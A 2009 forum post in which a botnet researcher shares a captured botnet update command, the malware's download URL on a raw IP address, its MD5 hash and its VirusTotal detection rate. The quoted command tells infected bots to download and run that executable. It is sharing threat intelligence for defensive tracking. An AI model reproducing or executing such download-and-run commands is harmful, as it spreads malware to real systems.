Author Topic: Some botnet update during spying.  (Read 2947 times)

0 Members and 1 Guest are viewing this topic.

August 23, 2009, 03:07:57 pm
Read 2947 times

log0

  • Jr. Member

  • Offline
  • **

  • 12
    • OnHacks
Not really a domain... caught this while playing with my tool, perhaps of use to anyone?

Quote
http://94.76.194.116/xx8.exe

It got 6/41 in VirusTotal. md5 : 7904937c07c031e81023dbd81ac93b64.

Update command :

Quote
#xx6 :.flushdns |.down -S |.update -S |.update http://94[dot]76[dot]194[dot]116/xx8.exe x5s5g6q31n3.exe x5s5g6q31n3

Was coding botnet tracking automation... don't know how to start helping the internet... btw wrote a short note on my blog.
Welcome comments to what to do with it! Thanks.
"Everyone has got the will to win, its only those with the will to prepare that do win." - Mark Cuban

honeypots, botnets, crime, etc... let's grep a drink.
On Hacking Across Boundaries - http://onhacks.org